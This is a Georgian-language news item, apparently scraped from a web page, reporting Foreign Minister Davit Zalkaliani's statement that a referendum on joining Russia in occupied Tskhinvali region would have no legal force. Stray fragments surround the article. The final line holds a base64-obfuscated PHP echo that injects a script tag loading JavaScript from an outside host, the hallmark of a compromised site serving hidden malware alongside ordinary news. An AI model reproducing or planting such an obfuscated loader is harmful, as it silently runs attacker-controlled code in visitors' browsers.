celsiusi
ავერსი შნაიდერი
რა თქმა უნდა, მიუღებელია ყოველგვარ რეფერენდუმებზე საუბარი იმ პირობებში, როდესაც საქართველოს ტერიტორია არის ოკუპირებული, ოკუპაციას აქვს არამხოლოდ პოლიტიკური, არამედ სამართლებრივი შეფასებაც, - ამის შესახებ საქართველოს ვიცე-პრემიერმა, საგარეო საქმეთა მინისტრმა დავით ზალკალიანმა ოკუპირებულ ცხინვალის რეგიონში რუსეთთან შეერთების საკითხზე რეფერენდუმის ჩატარებასთან დაკავშირებით განაცხადა.
 
მინისტრის შეფასებით, ოკუპაციის პირობებში რეფერენდუმს იურიდიული ძალა არ ექნება.
 
„რა თქმა უნდა, მიუღებელია ყოველგვარ რეფერენდუმებზე საუბარი იმ პირობებში, როდესაც საქართველოს ტერიტორია არის ოკუპირებული, ოკუპაციას აქვს არამხოლოდ პოლიტიკური, არამედ სამართლებრივი შეფასებაც. ეს სამართლებრივი შეფასება გახლავთ სტრასბურგის სასამართლოს გადაწყვეტილება იმის შესახებ, რომ საქართველოს ოკუპირებულ რეგიონებში მიმდინარეობს ოკუპაცია, შესაბამისად ოკუპაციის პირობებში არანაირ რეფერენდუმს არ ექნება არანაირი იურიდიული ძალა და არ ექნება მით უფრო იმ ფონზე, როდესაც ასობით ათასი ჩვენი მოქალაქე არის განდევნილი საკუთარი სახლებიდან ეთნიკური წმენდის შედეგად და მათ არ ეძლევათ საკუთარ სახლებში დაბრუნების უფლება“, - აღნიშნავს ზალკალიანი.
 
მინისტრის განცხადებით, დღევანდელ მძიმე სიტუაციაში, სამწუხაროდ, კვლავ ისმის სხვადასხვა სახის მოწოდებები, რომელიც სრულ წინააღმდეგობაშია საერთაშორისო სამართლის ნორმებთან და იმ ფუნდამენტურ პრინციპებთან, რომელიც არის ღირებული როგორც ევროკავშირისთვის, ისე საქართველოსთვის.
 
„მიუხედავად იმისა, რომ არის გარკვეული მცდელობები, რომ ის მძიმე შედეგები, რომელიც ვიხილეთ 2008 წელს, კვლავ იყოს განმეორებული საქართველოში და საქართველო კვლავ იყოს ჩართული პროვოკაციებში, ჩვენი ხელისუფლება ამას არ დაუშვებს, რადგან ჩვენ ვართ თანმიმდევრული ჩვენი სამშვიდობო პოლიტიკის მიმართ, რაც გამოაცხადა ჩვენმა ხელისუფლებამ, პოლიტიკის, რომელიც მიმართულია დეოკუპაციისკენ, ძალის არ გამოყენების ვალდებულებისკენ. ჩვენ ამ ვალდებულების ერთგულნი ვართ და ვამბობთ, რომ არ გამოვიყენებთ ძალას ტერიტორიული მთლიანობის აღსადგენად. ეს არის ჩვენთვის ის იურიდიული ვალდებულება, რომელსაც საერთაშორისო თანამეგობრობა ძალიან მკაფიოდ უჭერს მხარს“, - განაცხადა ზალკალიანმა.
 
დავით ზალკალიანის განცხადებით, საქართველო ერთგულია ჩართულობის პოლიტიკისა და ოკუპირებული ხაზის მეორე მხარეს მყოფ საქართველოს მოქალაქეებისთვის იმ სიკეთეების გაზიარებისა, რომელიც ევროკავშირში საქართველოს გაწევრიანებას მოაქვს.
 
მინისტრის კომენტარს საგარეო საქმეთა სამინისტრო ავრცელებს.
729
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");